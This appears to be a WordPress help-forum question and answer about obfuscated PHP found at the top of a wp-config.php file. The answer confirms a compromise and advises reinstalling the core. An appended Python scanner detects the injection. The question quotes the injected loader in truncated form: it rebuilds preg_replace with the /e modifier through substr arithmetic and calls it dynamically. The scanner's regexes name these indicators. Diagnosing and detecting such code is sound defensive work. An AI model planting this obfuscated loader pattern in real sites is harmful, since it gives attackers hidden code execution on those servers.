Garbage in beginning of wp-config.php – was this WP installation compromised?

I hadn’t realized that one of my WP sites hadn’t been accessed over the last months, and consequently hadn’t been updated, and today I found that my config.php has some garbage at the beginning of the file:

<?php $uqnrguvics="x7825r% ... more garbage ... 
825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y3/(.*)/epreg_replacezrxmuexghf"; 
$uvozcxjtxg = explode(chr((253-209)),'4137,25,2713,60,8524,67 ... more garbage ...
'); $tuyrkvuamr=substr($uqnrguvics,(49619-39513),(27-20)); 
if (!function_exists('zpjgeglbtt')) { function zpjgeglbtt($lwtbhpepkn, $lkvuvnwcsu) { 
$sblzyeefjv = NULL; for($mxodybdogx=0;$mxodybdogx<(sizeof($lwtbhpepkn)/2);$mxodybdogx++)
{ $sblzyeefjv .= substr($lkvuvnwcsu, $lwtbhpepkn[($mxodybdogx*2)],
$lwtbhpepkn[($mxodybdogx*2)+1]); }
return $sblzyeefjv; };} $rudmfyfhqb="\    x20\57... hex garbage ... \52\x2f\40";     
$vkyezvmvec=substr($uqnrguvics,(42452-32339),(65-53)); 
$vkyezvmvec($tuyrkvuamr, $rudmfyfhqb, NULL); $vkyezvmvec=$rudmfyfhqb; 
$vkyezvmvec=(811-690); $uqnrguvics=$vkyezvmvec-1; ?>
<?php 
HERE comes a usual wp-config.php, which as far as I remember is the one I had before

The file also has DOS encoding, although I’m running it on Linux.

(I have included line breaks).

Does this mean this installation has been compromised? Or is this something automatically included by WP somehow?

If it was, is it enough to just change the admin password? Logging in as admin doesn’t show anything unusual.

1 Answer
1

Yes, it appears so. In my experience the best thing to do is re-upload a fresh WordPress core to ensure that all traces have been squashed.

It happens… If you aren’t already using security plugins I’d recommend Wordfence and BruteProtect to help keep brute force attacks out as well as checking your core WordPress files for changes.
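An added example, not part of the original question or answer: a small Python scanner that walks a WordPress directory and flags PHP files showing the indicators visible in the sample from the question (a second `<?php` tag right after an injected block, the `/(.*)/e` and `preg_replace` strings carried inside the blob, `substr()` offsets hidden behind arithmetic, DOS line endings). The check names, the two-hit threshold and the sample bytes are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# Indicators read off the sample in the question; check names are this example's own.
CHECKS = {
    # injected block ends with "?>" and the genuine file's "<?php" follows directly
    "second_php_open_tag": re.compile(rb"\?>\s*<\?php"),
    # the blob carries "/(.*)/e" + "preg_replace" back to back; the two substr()
    # calls slice out 7 and 12 characters, the lengths of exactly those strings
    "preg_replace_e_string": re.compile(rb"/\(\.\*\)/e\s*preg_replace"),
    # substr($var,(49619-39513),(27-20)): offsets hidden behind arithmetic
    "substr_arithmetic": re.compile(
        rb"substr\(\s*\$\w+\s*,\s*\(\d+-\d+\)\s*,\s*\(\d+-\d+\)\s*\)"),
    # DOS line endings, which the asker noticed on a Linux host
    "crlf_line_endings": re.compile(rb"\r\n"),
}

# Constructed samples (inert, no payload), shaped like the file in the question.
SAMPLE_INFECTED = (
    b'<?php $aaaa="x7825r%CONSTRUCTED/(.*)/epreg_replacezz"; '
    b'$b=substr($aaaa,(49619-39513),(27-20)); '
    b'$c=substr($aaaa,(42452-32339),(65-53)); '
    b'$c($b, $d, NULL); ?>\r\n<?php\r\ndefine("DB_NAME", "wp");\r\n'
)
SAMPLE_CLEAN = b'<?php\ndefine("DB_NAME", "wp");\n$table_prefix = "wp_";\n'


def scan_php(data: bytes) -> list:
    """Return the names of all indicators found in one file's bytes."""
    return [name for name, rx in CHECKS.items() if rx.search(data)]


def scan_tree(root, min_hits=2) -> dict:
    """Map each *.php file under root with >= min_hits indicators to its hits."""
    flagged = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php(path.read_bytes())
        if len(hits) >= min_hits:
            flagged[str(path)] = hits
    return flagged


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in scan_tree(root).items():
        print(path, ", ".join(hits))
```

A hit confirms that a file was modified; an empty result only means these particular patterns were not found, so it does not replace comparing the installation against a fresh copy of the core files.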
